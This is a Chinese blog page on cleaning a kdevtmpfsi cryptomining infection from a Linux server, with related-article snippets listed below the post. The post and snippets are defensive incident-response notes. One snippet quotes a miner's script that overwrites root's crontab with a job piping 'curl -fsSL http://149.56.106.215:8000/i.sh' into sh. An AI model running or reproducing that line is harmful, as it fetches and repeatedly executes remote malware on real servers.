【实战】记录一次服务器挖矿病毒处理

最新推荐文章于 2024-05-05 20:37:48 发布
最新推荐文章于 2024-05-05 20:37:48 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: web安全 文章标签: 安全 ubuntu 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/119085774
版权

信息收集及kill:

查看监控显示长期CPU利用率超高,怀疑中了病毒

在这里插入图片描述

top 命令查看进程资源占用:
在这里插入图片描述
netstat -lntupa 命令查看有无ip进行发包
在这里插入图片描述
netstat -antp
在这里插入图片描述
然而并没有找到对应的进程名

查看java进程和solr进程

在这里插入图片描述

ps aux :查看所有进程
在这里插入图片描述
除相关进程:kill -9(无条件退出进程)

为了防止有定时任务,再次启动恶意进程
crontab -l 命令查看正在进行中的定时任务
crontab -r 删除所有定时任务

在这里插入图片描述居然没有????

保存样本,删除木马进程文件:

find / -name kdevtmpfsi :查找进程文件(需要root权限)

最低0.47元/天 解锁文章
b1gpig安全
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
针对挖矿病毒的简易三板斧
MSB_WLAQ的博客
09-30 1231
一. 简介 本文只基础说明遇到挖矿病毒的简单快速的处理思路,现实生产中遇到的病毒复杂的多。当企业面对病毒攻击的时候,一定要尽快交予专业安全人士处理,减少损失。 二. 实现过程(研究内容) 以linux系统为例,对中毒主机进行断网隔离后,查找挖矿病毒的基本操作: 1寻找进程,使用命令:Top 2删除进程,使用命令:kill -i PID 3删除文件,使用命令:rm -rf 后续处理:溯源分析,修补漏洞,安全加固 三. 检测方式(防御建议) 挖矿病毒特征:最大的特征就是主机的cpu资源占用,可
优雅的处理vue项目异常实战记录
12-11
是时候一站式统一处理异常!!!(针对vue项目) 全局异常捕获 Vue.config.errorHandler = function (err, vm, info) { // 指定组件的渲染和观察期间未捕获错误的处理函数。这个处理函数被调用时,可获取错误...
164、应急响应——挖矿脚本检测指南&样本定性&文件清楚&入口修复
qq_55202378的博客
03-27 711
这台服务器开放了web服务,直接用河马扫描是否存在后门,对比挖矿脚本上传的时间和后门存在的时间,再结合日志分析,判断谁访问了后门路径。被植入挖矿脚本会显示异常的连接,将远程IP放到威胁情报中心(如微步在线、奇安信威胁情报中心)进行检测。删除进行,下面这个图就是竞争型挖矿脚本,它会杀死其他挖矿病毒的进程。挖矿脚本里面,通常有一个配置文件,文件中会记录攻击者的IP和钱包。挖矿的前提是,黑客已经取得了你电脑的权限,如何取得是重点。判断被植入挖矿脚本,最重要的是看CPU和GPU占用情况。记录挖矿脚本存在的时间。
Linux【问题记录 03】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理
最新发布
2401_83974173的博客
05-05 703
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
一次简单的挖矿病毒清除---实战
weixin_45300266的博客
01-09 2089
1、top 命令查看进程,cpu使用达到100% 此处尝试使用 kill -9+ 进程号 ,强制杀死进程后,病毒进程又重启,怀疑设置了定时任务 2、查看木马保存路径 通过ls -l proc/进程号/exe命令查看定位木马程序所在的目录,上图PID 为进程号 3、进入到木马文件所在路径 通过进程号定位到病毒文件后,进入到对应的目录 cd /usr/lib/updated ls 或者 ls -alh 4、使用删除命令 rm -rf + 病...
实战某高校的一次挖矿病毒的应急处置
qq_44433172的博客
09-19 1499
一次加班引发的应急处置的故事
Linux系统占用cpu病毒处理记录
一本正经学技术
09-24 973
一、现象 近期服务器上面不知从哪里感染了病毒,导致CPU占用率特别高,中间临时处理过,由于不是专业处理,只能手动查看进程并结束进程ID号。 但手动的办法只能临时解决,病毒会再次启动,占用服务器cpu资源,查看定时任务,也没有相关任务记录。 crontab -l #无相关定时任务列表显示,如下图 二、经验 昨天刚处理过一台云服务器的kthreaddk病毒程序,处理方法简单记录如下: 1、查看异常进程,并kill掉,例如异常进程pid为26525 [root@hostname /]# kill -9 26
挖矿病毒
weixin_34367257的博客
10-28 2095
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "...
一次OOM问题排查过程实战记录
01-05
上周运维反馈线上程序出现了OOM,程序日志中的输出为 ...看线程名称应该是tomcat的nio工作线程,线程在处理程序的时候因为无法在堆中分配更多内存出现了OOM,幸好JVM启动参数配置了-XX:+HeapDumpOnOutOfMemoryE
一次Webpack配置文件的分离实战记录
12-09
Webpack对于每个前端人员来说都不会怎么陌生,它将每一个静态文件当做一个模块,经过一系列的处理为我们整合出最后的需要的js、css、图片、字体等文件。 webpack.config.js就是Webpack的配置文件,这个文件需要自己...
一次SSH破解密码实战
01-20
这个服务器应该开启了禁ping 那么我们初步断定是个linux服务器,154段子 那么我们nmap扫描一下这个ip的开放端口。 开放了22ssh端口,80http端口,8888的一个服务 我们进入http://154.213.29.152:8888/ 发现使用了...
一次实战记录-附件资源
03-05
一次实战记录-附件资源
Linux中处置挖矿病毒样本演示
qq_39330735的博客
03-29 1327
Linux处理挖矿病毒
挖矿病毒分析
热门推荐
LiBai'S BLOG
03-10 1万+
病毒样本 分析样本 要求 确定二进制文件类型 给出钱包地址的 IOC 特征 文件类型:PE64 脱壳 upx.exe -d svhostd.jpg.virus 钱包地址的 IOC 特征 云沙箱自动分析
Linux应急响应-挖矿(kdevtmpfsi)——事件复现(含样本)
W小哥
03-16 4530
此次复现挖矿清除不溯源,只是简单的记一下 一、事件背景 某天打开我的服务器,发现CPU飙到100%。肯定有问题,应该又被挖矿服务器:Linux系统 二、事件处理 2.1 top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了 kill -9 但是过了一会儿又自动启动了 查看定时任务:crontab -l 删除定时任务:crontab -r 删除相关文件: find /
挖矿蠕虫样本分析
weixin_30319153的博客
11-16 468
转载于:https://www.cnblogs.com/0x4D75/p/9970491.html
第164天:应急响应-挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
qq_46081990的博客
07-06 527
挖矿病毒的背景一般是CPU、GPU占用很高,服务器耗电量很大我们上来首先做的是看CPU、GPU占用率,定位占用率很高的进程找到挖矿病毒样本,将病毒样本放到微步在线上分析由于挖矿病毒通常会做权限维持,单纯删除病毒文件无法根治,还是会重新生成所以要继续排查计划任务、启动项、映像劫持等,删除干净后,杀死进程并删除病毒文件即可由于黑客能上传挖矿病毒,那必定是拿到了服务器权限的,所以重点还需要知道黑客是如何进来的(比如黑客通过ssh弱口令爆破拿到的服务器,那么我们如何知道呢?
qW3xT.5 记一次解决挖矿病毒
qq_33129875的博客
01-30 1099
两个月前被4.0版本搞过,没想到又被搞了一次,版本变成5.0了。 原因的话可能是redis没有设置IP限制,当时我自己搞了个玩,我设的是0.0.0.0.  em~~,就是这个东西。 解决办法的话:简单直接点 1,删定时任务:crontab -l,如下图,就是这个东西,然后crontab -r删掉 2, 删相关文件: (1)改目录下有个root文件,删掉。 (2)然后把/t...
近期DDG挖矿病毒防护与分析
weixin_34018169的博客
08-13 419
0x01 导语 最近观察到,7月底8月初以来,又较大范围出现多例感染DDG挖矿病毒的情况(DDG从去年开始出现和活跃),该病毒通过Redis服务传播,并且运行在Linux操作系统环境下 该威胁可以被阿里云态势感知发现并产生警报: 本文给出在感染该挖矿病毒情况下的恢复方案、防护措施以及对该挖矿病毒进行一定程度的分析 0x02 恢复与防护 如果服务器出现CP...
centos挖矿病毒
04-26
CentOS挖矿病毒是一种恶意软件,它会感染CentOS操作系统并利用系统资源进行加密货币的挖矿。这种病毒通常通过网络攻击、恶意软件下载或者潜在的漏洞来传播。 一旦感染,挖矿病毒会在受感染的计算机上运行一个或多个挖矿程序,这些程序会利用计算机的处理能力和电力资源来进行加密货币的挖矿操作。这样的行为会导致计算机性能下降、电力消耗增加,并且可能会给用户带来经济损失。 为了防止CentOS挖矿病毒的感染,你可以采取以下措施: 1. 及时更新操作系统和软件补丁,以修复潜在的漏洞。 2. 安装可靠的防病毒软件,并定期进行全盘扫描。 3. 谨慎下载和安装软件,尤其是来自不可信的来源。 4. 避免点击可疑的链接或打开未知的附件。 5. 使用强密码,并定期更改密码。 6. 定期备份重要数据,以防止数据丢失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值